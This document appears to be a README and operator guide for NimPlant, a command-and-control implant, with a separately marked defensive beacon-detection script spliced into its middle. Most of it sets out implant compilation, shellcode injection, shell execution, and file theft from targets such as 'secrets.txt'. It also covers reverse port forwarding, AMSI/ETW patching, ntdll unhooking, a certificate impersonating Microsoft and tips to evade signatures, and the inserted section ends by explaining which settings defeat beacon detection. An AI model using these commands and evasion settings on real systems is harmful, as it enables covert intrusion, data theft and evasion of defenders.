NimPlant
NimPlant is a lightweight, cross-platform command-and-control (C2) implant written in Nim. It provides HTTP/HTTPS communication, configurable sleep intervals, file operations and shellcode execution capabilities.
DISCLAIMER: This tool is intended solely for authorized security testing and red-team engagements. Unauthorized use against systems you do not own or do not have explicit permission to test is illegal and unethical. Always obtain written authorization before conducting offensive security operations.
Installation
Server Setup
# Clone the repository
git clone https://github.com/chvancooten/NimPlant.git
cd NimPlant
# Install Python dependencies for the server
pip install -r server/requirements.txt
# Install Nim (required for compiling implants)
# On Linux
curl https://nim-lang.org/choosenim/init.sh -sSf | sh
# Install Nim dependencies
nimble install -y winim nimcrypto zippy
Compile the Implant
# Edit configuration before compiling
nano config.toml
# config.toml - NimPlant configuration
[server]
ip = "0.0.0.0"
port = 443
registerPath = "/api/register"
taskPath = "/api/task"
resultPath = "/api/result"
[implant]
sleepTime = 10
sleepJitter = 20
killDate = "2026-12-31"
userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Compile the implant (Windows EXE)
python3 NimPlant.py compile -o exe
# Compile as DLL
python3 NimPlant.py compile -o dll
# Compile as shellcode (via sRDI)
python3 NimPlant.py compile -o shellcode
# Cross-compile for Windows from Linux
python3 NimPlant.py compile -o exe --crosscompile
Server Operations
Starting the Server
# Start the NimPlant C2 server
python3 NimPlant.py server
# Server starts listening on configured port
# Web UI available at https://server-ip:port/
Managing Implants
# In the NimPlant server console:
# List active implants
nimplant> list
# Interact with a specific implant
nimplant> interact <implant-id>
# View implant details
nimplant> info
# Kill an implant
nimplant> kill
Commands
Reconnaissance
# Get system information
nimplant> whoami
nimplant> hostname
nimplant> ipconfig
nimplant> env
# List running processes
nimplant> ps
# Get current working directory
nimplant> pwd
# List directory contents
nimplant> ls C:\Users
File Operations
# Upload a file to the target
nimplant> upload /local/path/file.exe C:\Windows\Temp\file.exe
# Download a file from the target
nimplant> download C:\Users\target\Documents\secrets.txt
# Read a file
nimplant> cat C:\Users\target\Desktop\notes.txt
# Create a directory
nimplant> mkdir C:\Windows\Temp\workdir
# Remove a file
nimplant> rm C:\Windows\Temp\file.exe
# Copy a file
nimplant> cp C:\source\file.txt C:\dest\file.txt
# Move a file
nimplant> mv C:\old\file.txt C:\new\file.txt
Execution
# Execute a shell command
nimplant> shell net user
# Execute a command via cmd.exe
nimplant> cmd /c dir C:\
# Run PowerShell command
nimplant> powershell Get-Process
# Execute assembly in memory (inline-execute)
nimplant> inline-execute /path/to/assembly.exe arg1 arg2
# Execute shellcode
nimplant> shinject <pid> /path/to/shellcode.bin
Network Operations
# List network connections
nimplant> netstat
# Reverse port forward
nimplant> rportfwd 8080 127.0.0.1 80
# Stop reverse port forward
nimplant> rportfwd stop 8080
Sleep and Communication
# Change sleep interval (seconds)
nimplant> sleep 30
# Change sleep jitter (percentage)
nimplant> jitter 40
# Combination: sleep 30 seconds with 40% jitter
nimplant> sleep 30
nimplant> jitter 40
HTTPS Communication
# Generate self-signed certificate for HTTPS
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt \
-days 365 -nodes -subj "/CN=cdn.microsoft.com"
# Place certificates in the server directory
cp server.key server/
cp server.crt server/
OPSEC Considerations
# NimPlant OPSEC features:
# - Encrypted C2 communications (AES-256)
# - Configurable sleep with jitter to avoid beacon detection
# - Kill date to auto-terminate after engagement
# - User-agent customization to blend with normal traffic
# - Direct syscalls to avoid API hooking (optional)
# Recommended practices:
# 1. Use legitimate-looking domain with valid HTTPS certificate
# 2. Set appropriate sleep times (30-60s for stealth)
# 3. Use redirectors between implant and C2 server
# 4. Set a kill date matching the engagement window
# 5. Rotate implant binaries to avoid signature detection
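The sleep/jitter settings above (sleepTime, sleepJitter) and the OPSEC note about jitter "to avoid beacon detection" describe a trade-off that is easiest to see from the defender's side. The following is an added example, not part of NimPlant and not the project's own code: it simulates check-in times under a sleep/jitter setting like the one in config.toml, writes them as constructed proxy log lines, and then scores every (client, host) pair by how regular its inter-request gaps are. The jitter semantics (sleepTime plus or minus sleepJitter percent, uniformly distributed) and the log line format are assumptions made for this example; real proxy logs and the implant's exact jitter algorithm may differ.

```python
"""Beacon-periodicity scoring over constructed proxy log lines.

Added example, not NimPlant code. Jitter semantics and the log format are
assumptions; adjust score_beacons() to your own proxy log fields.
"""
import random
import statistics
from datetime import datetime, timedelta
from typing import NamedTuple


class BeaconScore(NamedTuple):
    requests: int
    mean_gap: float   # mean seconds between requests
    cv: float         # coefficient of variation of the gaps (stdev / mean)
    flagged: bool     # True when the gaps are "too regular" for human traffic


def jittered_sleep(sleep_time: float, jitter_pct: float, rng: random.Random) -> float:
    """Assumed semantics: sleep_time +/- jitter_pct percent, uniform."""
    spread = sleep_time * jitter_pct / 100.0
    return sleep_time + rng.uniform(-spread, spread)


def simulate_checkins(sleep_time, jitter_pct, count, seed=7,
                      start=datetime(2026, 1, 1, 9, 0, 0)):
    """Constructed check-in timestamps for a given sleep/jitter setting."""
    rng = random.Random(seed)
    stamps, t = [], start
    for _ in range(count):
        stamps.append(t)
        t += timedelta(seconds=jittered_sleep(sleep_time, jitter_pct, rng))
    return stamps


def make_log_lines(stamps, client, host, path="/api/task"):
    """Constructed proxy log format: <iso-timestamp> <client> <host> <path> <status>."""
    return [f"{s.strftime('%Y-%m-%dT%H:%M:%S')} {client} {host} {path} 200"
            for s in stamps]


def score_beacons(lines, min_requests=10, cv_threshold=0.35):
    """Group requests per (client, host) and flag low-variance gap patterns.

    With sleepJitter = 40 the gaps are uniform on [0.6*T, 1.4*T], whose CV is
    about 0.23, so the pair is flagged; irregular browsing has a CV well above.
    """
    by_pair = {}
    for line in lines:
        ts, client, host, _path, _status = line.split()
        by_pair.setdefault((client, host), []).append(datetime.fromisoformat(ts))
    scores = {}
    for pair, stamps in by_pair.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if len(stamps) < min_requests or not gaps:
            continue
        mean = statistics.fmean(gaps)
        if mean <= 0:          # identical timestamps: nothing to measure
            continue
        cv = statistics.pstdev(gaps) / mean
        scores[pair] = BeaconScore(len(stamps), mean, cv, cv < cv_threshold)
    return scores


def demo():
    """One beaconing client (sleep 30, jitter 40) next to one browsing client."""
    beacon = make_log_lines(simulate_checkins(30, 40, 60),
                            "10.0.0.5", "cdn.example.invalid")
    rng = random.Random(3)
    t, browsing = datetime(2026, 1, 1, 9, 0, 0), []
    for _ in range(60):                       # constructed irregular browsing
        browsing.append(t)
        t += timedelta(seconds=rng.uniform(1, 600))
    noise = make_log_lines(browsing, "10.0.0.9", "news.example.invalid", path="/")
    return score_beacons(beacon + noise)


if __name__ == "__main__":
    for pair, s in demo().items():
        print(pair, f"n={s.requests} mean={s.mean_gap:.1f}s cv={s.cv:.2f} flagged={s.flagged}")
```

The point of the example is the number in the docstring: jitter widens the gap distribution but does not change its shape, so a client that talks to one host a few dozen times with a coefficient of variation under roughly 0.35 still stands out. Raising sleepTime lowers the request count per observation window, which is why long sleeps rather than large jitter values are what make this kind of check expensive for a defender.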
Evasion Configuration
# Additional config.toml evasion options
[implant]
sleepTime = 60
sleepJitter = 30
killDate = "2026-06-30"
userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
[evasion]
patchAmsi = true
patchEtw = true
unhookNtdll = true
Logging
# Server logs all interactions
# Logs stored in: server/logs/
# View engagement log
cat server/logs/nimplant.log
# Each implant session has its own log
ls server/logs/sessions/
Cleanup
# Terminate all active implants
nimplant> killall
# Individual implant cleanup
nimplant> interact <id>
nimplant> kill
# Remove artifacts from target (via shell before killing)
nimplant> shell del C:\path\to\implant.exe
nimplant> kill